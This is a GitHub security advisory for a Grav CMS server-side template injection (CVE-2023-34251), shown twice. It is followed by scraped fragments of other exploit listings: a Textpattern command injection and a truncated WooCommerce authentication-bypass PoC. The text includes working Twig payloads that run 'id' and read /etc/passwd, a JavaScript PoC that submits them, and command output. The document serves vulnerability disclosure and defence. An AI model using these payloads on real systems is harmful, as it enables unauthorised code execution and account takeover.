### Summary
I found an RCE(Remote Code Execution) by SSTI in the admin screen.

### Details
Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.

### PoC
1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`)
2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.
```js
(async () => {
  const nonce = document.querySelector("input[name=admin-nonce]").value;
  const id = document.querySelector("input[name=__unique_form_id__]").value;

  const payload = "{{['id']|map('system')|join}}"; // SSTI Payload

  const params = new URLSearchParams();
  params.append("task", "save");
  params.append("data[header][title]", "poc");
  params.append("data[content]", payload);
  params.append("data[folder]", "poc");
  params.append("data[route]", "");
  params.append("data[name]", "default");
  params.append("data[header][body_classes]", "");
  params.append("data[ordering]", 1);
  params.append("data[order]", "");
  params.append("toggleable_data[header][process]", "on");
  params.append("data[header][process][twig]", 1);
  params.append("data[header][order_by]", "");
  params.append("data[header][order_manual]", "");
  params.append("data[blueprint", "");
  params.append("data[lang]", "");
  params.append("_post_entries_save", "edit");
  params.append("__form-name__", "flex-pages");
  params.append("__unique_form_id__", id);
  params.append("admin-nonce", nonce);

  await fetch("http://127.0.0.1:8000/admin/pages/typography", {
    method: "POST",
    headers: {
      "content-type": "application/x-www-form-urlencoded",
    },
    body: params,
  });

  window.open("http://127.0.0.1:8000/admin/pages/poc/:preview");
})();
```

#### Execution Result
- Payload: `{{['id']|map('system')|join}}`
```sh
uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
```
- Payload: `{{['cat /etc/passwd']|map('system')|join}}`
```sh
## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd:*:31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces:*:32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore:*:33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents:*:55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod:*:56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate:*:200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod:*:202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver:*:203:203:Screensaver:/var/empty:/usr/bin/false _locationd:*:205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent:*:208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone:*:210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda:*:211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot:*:214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio:*:215:215:DP Audio:/var/empty:/usr/bin/false _postgres:*:216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt:*:217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin:*:218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw:*:219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr:*:220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver:*:221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios:*:222:222:NetBIOS:/var/empty:/usr/bin/false _warmd:*:224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull:*:227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics:*:228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced:*:229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt:*:230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin:*:231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw:*:232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos:*:233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous:*:234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache:*:235:235:Asset Cache Service:/var/empty:/usr/bin/false _coremediaiod:*:236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd:*:239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices:*:240:240:IconServices:/var/empty:/usr/bin/false _distnote:*:241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond:*:242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd:*:244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast:*:246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd:*:247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser:*:248:248:Setup User:/var/setup:/bin/bash _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs:*:251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy:*:252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset:*:253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _ctkd:*:259:259:ctkd Account:/var/empty:/usr/bin/false _applepay:*:260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd:*:261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants:*:262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd:*:265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd:*:268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld:*:273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd:*:274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod:*:275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge:*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome:*:289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets:*:291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false
```

#### PoC Video
- [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing)

### Impact
Remote Command Execution (RCE) is possible.

### Occurrences
- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174

### References
- [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)
- [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php)


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-34251

**Grav Server Side Template Injection (SSTI) vulnerability**

Critical severity GitHub Reviewed Published Jun 14, 2023 in getgrav/grav • Updated Jun 16, 2023

**Package**

**Affected versions**

< 1.7.42

**Summary**

I found an RCE(Remote Code Execution) by SSTI in the admin screen.

**Details**

Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.

**PoC**

1.  Log in to the administrator screen and access the edit screen of the default page "Typography". (http://127.0.0.1:8000/admin/pages/typography)
2.  Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (id) is being executed.

(async () \=> {
  const nonce \= document.querySelector("input\[name=admin-nonce\]").value;
  const id \= document.querySelector("input\[name=\_\_unique\_form\_id\_\_\]").value;

  const payload \= "{{\['id'\]|map('system')|join}}"; // SSTI Payload

  const params \= new URLSearchParams();
  params.append("task", "save");
  params.append("data\[header\]\[title\]", "poc");
  params.append("data\[content\]", payload);
  params.append("data\[folder\]", "poc");
  params.append("data\[route\]", "");
  params.append("data\[name\]", "default");
  params.append("data\[header\]\[body\_classes\]", "");
  params.append("data\[ordering\]", 1);
  params.append("data\[order\]", "");
  params.append("toggleable\_data\[header\]\[process\]", "on");
  params.append("data\[header\]\[process\]\[twig\]", 1);
  params.append("data\[header\]\[order\_by\]", "");
  params.append("data\[header\]\[order\_manual\]", "");
  params.append("data\[blueprint", "");
  params.append("data\[lang\]", "");
  params.append("\_post\_entries\_save", "edit");
  params.append("\_\_form-name\_\_", "flex-pages");
  params.append("\_\_unique\_form\_id\_\_", id);
  params.append("admin-nonce", nonce);

  await fetch("http://127.0.0.1:8000/admin/pages/typography", {
    method: "POST",
    headers: {
      "content-type": "application/x-www-form-urlencoded",
    },
    body: params,
  });

  window.open("http://127.0.0.1:8000/admin/pages/poc/:preview");
})();

**Execution Result**

*   Payload: {{['id']|map('system')|join}}

uid=501(<user\_name\>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(\_appserverusr),80(admin),81(\_appserveradm),98(\_lpadmin),701(com.apple.sharepoint.group.1),33(\_appstore),100(\_lpoperator),204(\_developer),250(\_analyticsusers),395(com.apple.access\_ftp),398(com.apple.access\_screensharing),399(com.apple.access\_ssh),400(com.apple.access\_remote\_ae) uid=501(<user\_name\>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(\_appserverusr),80(admin),81(\_appserveradm),98(\_lpadmin),701(com.apple.sharepoint.group.1),33(\_appstore),100(\_lpoperator),204(\_developer),250(\_analyticsusers),395(com.apple.access\_ftp),398(com.apple.access\_screensharing),399(com.apple.access\_ssh),400(com.apple.access\_remote\_ae)

*   Payload: {{['cat /etc/passwd']|map('system')|join}}

\## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:\*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:\*:0:0:System Administrator:/var/root:/bin/sh daemon:\*:1:1:System Services:/var/root:/usr/bin/false \_uucp:\*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico \_taskgated:\*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false \_networkd:\*:24:24:Network Services:/var/networkd:/usr/bin/false \_installassistant:\*:25:25:Install Assistant:/var/empty:/usr/bin/false \_lp:\*:26:26:Printing Services:/var/spool/cups:/usr/bin/false \_postfix:\*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false \_scsd:\*:31:31:Service Configuration Service:/var/empty:/usr/bin/false \_ces:\*:32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false \_appstore:\*:33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false \_mcxalr:\*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false \_appleevents:\*:55:55:AppleEvents Daemon:/var/empty:/usr/bin/false \_geod:\*:56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false \_devdocs:\*:59:59:Developer Documentation:/var/empty:/usr/bin/false \_sandbox:\*:60:60:Seatbelt:/var/empty:/usr/bin/false \_mdnsresponder:\*:65:65:mDNSResponder:/var/empty:/usr/bin/false \_ard:\*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false \_www:\*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false \_eppc:\*:71:71:Apple Events User:/var/empty:/usr/bin/false \_cvs:\*:72:72:CVS Server:/var/empty:/usr/bin/false \_svn:\*:73:73:SVN Server:/var/empty:/usr/bin/false \_mysql:\*:74:74:MySQL Server:/var/empty:/usr/bin/false \_sshd:\*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false \_qtss:\*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false \_cyrus:\*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false \_mailman:\*:78:78:Mailman List Server:/var/empty:/usr/bin/false \_appserver:\*:79:79:Application Server:/var/empty:/usr/bin/false \_clamav:\*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false \_amavisd:\*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false \_jabber:\*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false \_appowner:\*:87:87:Application Owner:/var/empty:/usr/bin/false \_windowserver:\*:88:88:WindowServer:/var/empty:/usr/bin/false \_spotlight:\*:89:89:Spotlight:/var/empty:/usr/bin/false \_tokend:\*:91:91:Token Daemon:/var/empty:/usr/bin/false \_securityagent:\*:92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false \_calendar:\*:93:93:Calendar:/var/empty:/usr/bin/false \_teamsserver:\*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false \_update\_sharing:\*:95:-2:Update Sharing:/var/empty:/usr/bin/false \_installer:\*:96:-2:Installer:/var/empty:/usr/bin/false \_atsserver:\*:97:97:ATS Server:/var/empty:/usr/bin/false \_ftp:\*:98:-2:FTP Daemon:/var/empty:/usr/bin/false \_unknown:\*:99:99:Unknown User:/var/empty:/usr/bin/false \_softwareupdate:\*:200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false \_coreaudiod:\*:202:202:Core Audio Daemon:/var/empty:/usr/bin/false \_screensaver:\*:203:203:Screensaver:/var/empty:/usr/bin/false \_locationd:\*:205:205:Location Daemon:/var/db/locationd:/usr/bin/false \_trustevaluationagent:\*:208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false \_timezone:\*:210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false \_lda:\*:211:211:Local Delivery Agent:/var/empty:/usr/bin/false \_cvmsroot:\*:212:212:CVMS Root:/var/empty:/usr/bin/false \_usbmuxd:\*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false \_dovecot:\*:214:6:Dovecot Administrator:/var/empty:/usr/bin/false \_dpaudio:\*:215:215:DP Audio:/var/empty:/usr/bin/false \_postgres:\*:216:216:PostgreSQL Server:/var/empty:/usr/bin/false \_krbtgt:\*:217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false \_kadmin\_admin:\*:218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false \_kadmin\_changepw:\*:219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false \_devicemgr:\*:220:220:Device Management Server:/var/empty:/usr/bin/false \_webauthserver:\*:221:221:Web Auth Server:/var/empty:/usr/bin/false \_netbios:\*:222:222:NetBIOS:/var/empty:/usr/bin/false \_warmd:\*:224:224:Warm Daemon:/var/empty:/usr/bin/false \_dovenull:\*:227:227:Dovecot Authentication:/var/empty:/usr/bin/false \_netstatistics:\*:228:228:Network Statistics Daemon:/var/empty:/usr/bin/false \_avbdeviced:\*:229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false \_krb\_krbtgt:\*:230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false \_krb\_kadmin:\*:231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false \_krb\_changepw:\*:232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false \_krb\_kerberos:\*:233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false \_krb\_anonymous:\*:234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false \_assetcache:\*:235:235:Asset Cache Service:/var/empty:/usr/bin/false \_coremediaiod:\*:236:236:Core Media IO Daemon:/var/empty:/usr/bin/false \_launchservicesd:\*:239:239:\_launchservicesd:/var/empty:/usr/bin/false \_iconservices:\*:240:240:IconServices:/var/empty:/usr/bin/false \_distnote:\*:241:241:DistNote:/var/empty:/usr/bin/false \_nsurlsessiond:\*:242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false \_displaypolicyd:\*:244:244:Display Policy Daemon:/var/empty:/usr/bin/false \_astris:\*:245:245:Astris Services:/var/db/astris:/usr/bin/false \_krbfast:\*:246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false \_gamecontrollerd:\*:247:247:Game Controller Daemon:/var/empty:/usr/bin/false \_mbsetupuser:\*:248:248:Setup User:/var/setup:/bin/bash \_ondemand:\*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false \_xserverdocs:\*:251:251:macOS Server Documents Service:/var/empty:/usr/bin/false \_wwwproxy:\*:252:252:WWW Proxy:/var/empty:/usr/bin/false \_mobileasset:\*:253:253:MobileAsset User:/var/ma:/usr/bin/false \_findmydevice:\*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false \_datadetectors:\*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false \_captiveagent:\*:258:258:captiveagent:/var/empty:/usr/bin/false \_ctkd:\*:259:259:ctkd Account:/var/empty:/usr/bin/false \_applepay:\*:260:260:applepay Account:/var/db/applepay:/usr/bin/false \_hidd:\*:261:261:HID Service User:/var/db/hidd:/usr/bin/false \_cmiodalassistants:\*:262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false \_analyticsd:\*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false \_fpsd:\*:265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false \_timed:\*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false \_nearbyd:\*:268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false \_reportmemoryexception:\*:269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false \_driverkit:\*:270:270:DriverKit:/var/empty:/usr/bin/false \_diskimagesiod:\*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false \_logd:\*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false \_appinstalld:\*:273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false \_installcoordinationd:\*:274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false \_demod:\*:275:275:Demo Daemon:/var/empty:/usr/bin/false \_rmd:\*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false \_accessoryupdater:\*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false \_knowledgegraphd:\*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false \_coreml:\*:280:280:CoreML Services:/var/db/coreml:/usr/bin/false \_sntpd:\*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false \_trustd:\*:282:282:trustd:/var/empty:/usr/bin/false \_mmaintenanced:\*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false \_darwindaemon:\*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false \_notification\_proxy:\*:285:285:Notification Proxy:/var/empty:/usr/bin/false \_avphidbridge:\*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false \_biome:\*:289:289:Biome:/var/db/biome:/usr/bin/false \_backgroundassets:\*:291:291:Background Assets Service:/var/empty:/usr/bin/false \_oahd:\*:441:441:OAH Daemon:/var/empty:/usr/bin/false \_oahd:\*:441:441:OAH Daemon:/var/empty:/usr/bin/false

**PoC Video**

*   PoC Video

**Impact**

Remote Command Execution (RCE) is possible.

**Occurrences**

*   https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174

**References**

*   PortSwigger: Server-side template injection
*   HackTricks: SSTI (Server Side Template Injection)

**References**

*   GHSA-f9jf-4cp4-4fq5
*   https://nvd.nist.gov/vuln/detail/CVE-2023-34251
*   getgrav/grav@244758d
*   getgrav/grav@71bbed1
*   getgrav/grav@8c2c1cb
*   getgrav/grav@9d01140
*   https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174

Published to the GitHub Advisory Database

Jun 16, 2023

Last updated

Jun 16, 2023

GHSA-f9jf-4cp4-4fq5: Grav Server Side Template Injection (SSTI) vulnerability

Red Hat Security Advisory 2023-3623-01 - Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services. These new packages include numerous enhancements and bug fixes. Issues addressed include cross site scripting and denial of service vulnerabilities.

Red Hat Security Advisory 2023-3623-01

Textpattern CMS version 4.8.8 suffers from a command injection vulnerability.

    # Exploit Title: Textpattern CMS v4.8.8 - Command Injection (Authenticated)# Date: 2023-06-15# Exploit Author: tmrswrr# Vendor Homepage: https://textpattern.com/# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip# Version: v4.8.8# Tested : https://release-demo.textpattern.co/--- Description ---Textpattern CMS Upload Plugin Command Injection:1) Login admin page , choose Plugin , Choose command.php file inside this payload: : system('id');2) Save it and do Active plugin yes and click Update from disk3) After open page you will see result: https://release-demo.textpattern.co/uid=33(www-data) gid=33(www-data) groups=33(www-data)

Textpattern CMS 4.8.8 Command Injection

WordPress Abandoned Cart Lite for WooCommerce plugin versions 5.14.2 and below proof of concept authentication bypass exploit.

    <?php/*# CVE-2023-2986Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress## Related Details- NVD Link : https://nvd.nist.gov/vuln/detail/CVE-2023-2986- Plugin Source : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/- Vulnerable versions : `version <= 5.14.2`- Patched version : `5.15.0`- Github POC Link :`https://github.com/Ayantaker/CVE-2023-2986`## Vulnerability Analysis- A blog link will be added.## Usage```bashsudo apt-get install php-curlphp poc.php http://target_host target_port max_cart_id_to_enumerate``````[*] Enumerating cart ID : 1[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc[*] Enumerating cart ID : 2[*] Enumerating cart ID : 3[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD[*] Enumerating cart ID : 4[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d[*] Enumerating cart ID : 5```> Entering the URL in browser will give you access to the respective users account. If the wordpress admin user himself has an entry, this will give access to the admin console leading to full compromise of the wordpress server.## DisclaimerThis Proof of Concept (POC) has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Author is not responsible or liable for any misuse of the POC. Use responsibly.*/// Uses the encryption functions sourced from the vulnerable plugin// https://github.com/TycheSoftwares/woocommerce-abandoned-cart/tree/v5.14.2/includes/classes/* Copied from https://github.com/TycheSoftwares/woocommerce-abandoned-cart/blob/v5.14.2/includes/classes/class-wcal-aes.php *//* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  *//*  AES implementation in PHP                                                                     *//*    (c) Chris Veness 2005-2014 www.movable-type.co.uk/scripts                                   *//*    Right of free use is granted for all commercial or non-commercial use under CC-BY licence.  *//*    No warranty of any form is offered.                                                         *//* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  *//** * Abandoned Cart Lite for WooCommerce * * It will handle the common action for the plugin. * * @author  Tyche Softwares * @package Abandoned-Cart-Lite-for-WooCommerce/Encrypt-Decrypt-Data *//** * It will genrate the encryption and decryption for data. * * @since 2.8 */class Wcal_Aes {    /**     * AES Cipher function [�5.1]: encrypt 'input' with Rijndael algorithm     *     * @param input message as byte-array (16 bytes)     * @param w     key schedule as 2D byte-array (Nr+1 x Nb bytes) -     *              generated from the cipher key by keyExpansion()     * @return      ciphertext as byte-array (16 bytes)     * @since 2.8     */    public static function cipher( $input, $w ) {        $Nb    = 4; // block size (in words): no of columns in state (fixed at 4 for AES)        $Nr    = count( $w ) / $Nb - 1; // no of rounds: 10/12/14 for 128/192/256-bit keys        $state = array(); // initialise 4xNb byte-array 'state' with input [�3.4]        for ( $i = 0; $i < 4 * $Nb;        $i++ ) {            $state[ $i % 4 ][ floor( $i / 4 ) ] = $input[ $i ];        }        $state = self::addRoundKey( $state, $w, 0, $Nb );        for ( $round = 1; $round < $Nr; $round++ ) { // apply Nr rounds            $state = self::subBytes( $state, $Nb );            $state = self::shiftRows( $state, $Nb );            $state = self::mixColumns( $state, $Nb );            $state = self::addRoundKey( $state, $w, $round, $Nb );        }        $state = self::subBytes( $state, $Nb );        $state = self::shiftRows( $state, $Nb );        $state = self::addRoundKey( $state, $w, $Nr, $Nb );        $output = array( 4 * $Nb ); // convert state to 1-d array before returning [�3.4]        for ( $i = 0; $i < 4 * $Nb;        $i++ ) {            $output[ $i ] = $state[ $i % 4 ][ floor( $i / 4 ) ];        }        return $output;    }    /**     * Xor Round Key into state S [�5.1.4].     *     * @since 2.8     */    private static function addRoundKey( $state, $w, $rnd, $Nb ) {        for ( $r = 0; $r < 4; $r++ ) {            for ( $c = 0; $c < $Nb;            $c++ ) {                $state[ $r ][ $c ] ^= $w[ $rnd * 4 + $c ][ $r ];            }        }        return $state;    }    /**     * Apply SBox to state S [�5.1.1].     *     * @since 